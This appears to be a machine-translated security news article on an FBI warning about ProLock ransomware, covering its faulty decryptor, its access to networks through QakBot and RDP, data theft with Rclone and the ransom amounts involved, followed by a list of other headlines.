Wednesday, October 21, 05:06
Home security The FBI warns that ProLock ransomware is the new threat

The FBI warns that ProLock ransomware is the new threat

Many hackers saw the new Covid 19 pandemic as the perfect opportunity to focus on an already overloaded healthcare sector. ProLock ransomware is another threat added to the list.

The FBI issued a warning earlier this month to alert organizations to the new threat factor, saying its targets in USA include entities in the following areas: healthcare, government, finance and retail.

ProLock ransomware

Decryption malfunction

The FBI does not encourage you to comply with the requirements of any hacker. This would only increase their confidence in continuing such attacks.

With ProLock, the decryptor does not work properly and data will be lost. Files larger than 64MB may be corrupted during the decryption process.

Losing 1 byte per 1KB is possible with files over 100MB and extra work may be required for the decryptor to work properly. This issue will increase the downtime of an organization even if they comply with the hacker's requirements.

Malware launched as PwndLocker in late 2019, but has made a name for itself by targeting businesses and local governments, adjusting the ransom requirements to the size of the compromised network.

After a bug that allowed free decryption was fixed, PwndLocker appeared as ProLocker in March and its activity began to escalate.

Network input

According to a recent report by cybersecurity Group-IB‌, ProLock partnered with QakBot banking trojan to gain access to victims' networks. This probably contributed to the rise of this ransomware.

Trojan doesn't install this ransomware family, but runs a script to let hackers invade the victims' network so they can map it and move sideways. The payload is extracted from a BMP or JPG file named WinMgr and loaded into memory.

Like other ransomware operators, ProLock spends little time on the victim network looking for high-value and important systems. data for theft. The information is sent using Rclone a command line tool for synchronization with various storage services in cloud.

The ransom demand after the encryption comes with the threat that the data of the victims will be circulated on public websites and social media, unless payment is made for decryption.

Other methods include the incorrectly configured Remote Desktop Protocol (RDP). For networks with one-factor authentication, o hacker uses stolen login details.

Once input, ProLock operators make sure they leave no options for recovering files without payment. If found backups and shadow copies, either deleted or encrypted.

With ransom claims between $ 175.000 and over $ 660.000, ProLock is as serious a threat as other, more infamous ransomware families like Maze, Sodinokibi, Ryuk or LockerGoga, who are considered top employees in the ransomware business.


Please enter your comment!
Please enter your name here

Teo Ehc
Teo Ehc
Be the limited edition.


Google removes two ad blockers that collect user data

Google removed two ad blocker extensions from the official Chrome Web Store over the weekend after realizing that they were stealing ...

Two out of five employees are not sure what phishing is

The COVID-19 pandemic posed a significant challenge for businesses around the world, as the dispersed workforce seems to be ...

Hackers disguise themselves as McAfee staff and deceive users

According to Google, hackers backed by the Chinese government were disguised as McAfee employees to trick users into ...

How to find products sold by Amazon itself

Amazon acts as an intermediary in the sale of millions of goods by thousands of sellers around the world. The quality of these products varies ....

How to stop the automatic switching of AirPods between iPhone and iPad

AirPods and AirPods Pro automatically switch between iPhone and iPad. If you turn off the iPad and start a call on your iPhone, ...

The Windows 10 KB4579311 update has an installation problem

Windows 10 users face many problems when installing the latest cumulative update KB4579311 and those who can ...

The big "Twitter hack" was the result of employee fraud

The biggest Twitter hack that has become known to date, was the one that took place last July and resulted in ...

Gang ransomware donates part of ransom to charities

The Darkside ransomware gang has donated 10 thousand dollars from the ransom it has collected from its victims to Children International ...

FinCEN fines $ 60 million companies for bitcoin money laundering

The US Treasury Department's Financial Crimes Enforcement Network (FinCEN) today announced the first sentence against cryptocurrency services, Helix and ...

US: accuse Russians of global attacks

Six Russian agents have been indicted by the US Department of Justice for attacks related to the Winter Olympics in Pyeongchang, ...